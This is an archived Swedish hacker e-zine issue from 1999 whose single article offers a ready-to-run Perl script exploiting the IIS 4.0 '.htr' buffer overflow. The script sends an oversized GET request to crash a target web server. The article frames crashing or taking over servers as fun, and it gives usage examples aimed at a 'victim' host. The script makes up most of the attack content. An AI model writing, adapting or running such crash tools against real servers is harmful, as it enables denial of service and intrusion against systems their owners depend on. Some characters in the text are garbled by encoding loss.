informis/textfiles
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
textfiles/magazines/SWEDISH/VSU9.txt

163 lines
4.9 KiB
Plaintext
Raw Normal View History

Initial commit
2021-04-15 13:31:59 -05:00
_ __ ___
| | / /___ _____ / (_)___ _____ _
| | / / __ `/ __ \/ / / __ `/ __ `/
| |/ / /_/ / / / / / / /_/ / /_/ /
|___/\__,_/_/ /_/_/_/\__, /\__,_/
/____/
_____ __ _ _ __
/ ___// /__(_)_(_) /__________ _____ ___ ____ ___ ____ _
\__ \/ //_/ __ \/ __/ ___/ __ `/ __ `__ \/ __ `__ \/ __ `/
___/ / ,< / /_/ / /_(__ ) /_/ / / / / / / / / / / / /_/ /
/____/_/|_|\____/\__/____/\__,_/_/ /_/ /_/_/ /_/ /_/\__,_/
__ __ __
/ / / /___ ____ _____/ /___ ____ ___ ____ ______
/ / / / __ \/ __ `/ __ / __ \/ __ `__ \/ __ `/ ___/
/ /_/ / / / / /_/ / /_/ / /_/ / / / / / / /_/ / /
\____/_/ /_/\__, /\__,_/\____/_/ /_/ /_/\__,_/_/
/____/
VANLIGA SK<53>TSAMMA UNGDOMAR NUMMER 9 - JUNI 1999
"sommaren <20>r kort / det mesta regnar bort" -- Vergilius
Antal prenumeranter
-=================-
runt 370
Officiell emailadress till VSU-redaktionen
-========================================-
harnhammar@yahoo.com
Ladda ner gamla nummer av VSU
-===========================-
http://welcome.to/Zineworld
http://c5.hakker.com/magazines/
.. och s<>d<EFBFBD>r en 11 andra websidor d<>r ute p<> Informationsmotorv<72>gen.
Medverkande skribenter i detta nummer
-===================================-
Ulf
------------------------------------------------------------------------------
VSU HTR CRASH v1.0
-================-
Nu kan du b<>de krascha och ta <20>ver IIS4.0-webservrar som k<>rs under
Windows NT 4.0! Det <20>r den n<>st vanligaste typen av webservrar p<> n<>tet
efter Apache - speciellt m<>nga stora f<>retag som <20>r f<>r uppstyltade och
h<EFBFBD>mmade f<>r att v<>ga anv<6E>nda Linux och Apache k<>r IIS!
eEye Digital Security Team (http://www.eeye.com/) postade nyligen ett
inl<EFBFBD>gg om detta p<> den s<>kerhetsinriktade mailinglistan Bugtraq.
IIS-webservrarna har en buffer overflow-bug i sin hantering av en speciell
typ av filer vars namn slutar p<> ".htr". Det enda man beh<65>ver g<>ra <20>r att
skicka en vanlig GET-request till webservern, f<>r ett extremt l<>ngt
filnamn som slutar p<> ".htr". D<> kan man ta <20>ver webservern (om man kan
koda assembler under Windows NT) eller krascha den.
F<EFBFBD>r att g<>ra det hela <20>nnu v<>rre s<> (1) loggar inte webservern vem som har
angripit den, och (2) Microsoft har inte n<>gon patch f<>r denna bug f<>rdig
<EFBFBD>nnu.
Detta tyckte ju vi verkade vara roligt, s<> vi kodade minsann ett eget Perl
5-skript f<>r att krascha s<>dana webservrar. Du installerar skriptet genom
att <20>ndra f<>rsta raden s<> att den pekar p<> Perl 5-tolken p<> ditt system,
och sedan <20>ndrar du skriptets accessr<73>ttigheter s<> att det blir k<>rbart.
Du anv<6E>nder v<>rt skript s<> h<>r:
./vsu_htr_crash www.0ffer.com
(om webservern svarar p<> port 80, som de flesta webservrar g<>r)
eller:
./vsu_htr_crash www.ett-annat-0ffer.nu 8080
(om den ist<73>llet svarar p<> port 8080)
S<EFBFBD> var det med det! Gl<47>m inte bort att k<>pa Jan Svenssons nya bok "S.H.A.
- Hackergruppen som skakade Sverige" (Kentaur Bokf<6B>rlag), som ber<65>ttar mer
om denna hemlighetsfulla gamla grupp.
Jag har f<>tt in v<>ldigt d<>ligt med material till VSU#10, s<> skriv g<>rna
artiklar <20>t VSU och skicka in dem till mig. Hittills har jag tagit med
n<EFBFBD>stan allt material som folk har skickat in.
Solen skiner. Dags att st<73>nga av datorn och g<> ut.
// Ulf of VSU
#!/usr/bin/perl --
# VSU HTR Crash v1.0
# (?) Copywrong 1999 Vanliga Sk<53>tsamma Ungdomar
# Kodad av Ulf of VSU den 16:e juni 1999
# Buggen funnen av eEye Digital Security Team
use Socket;
# 0.0 INITIALISERING OCH INSTRUKTIONER
print "VSU HTR Crash v1.0\n".
"(?) Copywrong 1999 Vanliga Sk<53>tsamma Ungdomar\n".
"Kodad av Ulf of VSU den 16:e juni 1999\n".
"Buggen funnen av eEye Digital Security Team\n\n";
if (($#ARGV < 0) || ($#ARGV > 1) || ($ARGV[0] eq "-h") ||
($ARGV[0] eq "--help") || ($ARGV[0] eq "-?"))
{ print "Anv<6E>ndning: $0 server [portnr]\n"; exit; }
$| = 1; $crlf = "\015\012";
($machine, $port) = @ARGV; $bugstr = "a" x 3800;
if ($port eq "") { $port = 80; }
$http = "GET /$bugstr.htr HTTP/1.1$crlf".
"Host: $machine$crlf".
"User-Agent: Mozilla/4.05 [en] (Win95; I)$crlf".
"Connection: close$crlf$crlf";
# 1.0 UPPKOPPLING MOT WEBSERVERN
$tcp = getprotobyname("tcp");
socket(SOK, PF_INET, SOCK_STREAM, $tcp) or die "Socketfel!\n";
print "S<>ker...";
$numb = inet_aton($machine) or die " hittar den inte!\n";
$con = sockaddr_in($port, $numb);
print " ok\nKopplar upp...";
connect(SOK, $con) or die " g<>r inte mot denna port!\n";
# 2.0 SKICKAR DEN 0NDA HTTP-REQUESTEN
select SOK; $| = 1; select STDOUT; print " ok\nSkickar d<>dsst<73>ten...";
print SOK $http;
# 3.0 VISAR VAD WEBSERVERN EVENTUELLT SKICKAR TILLBAKS
print "\n";
print while <SOK>;
close SOK or die "\nSocketfel!\n";
print "\nKlart!\n";
# VSU 1999 - Stil, Bildning och Moral
Reference in New Issue Copy Permalink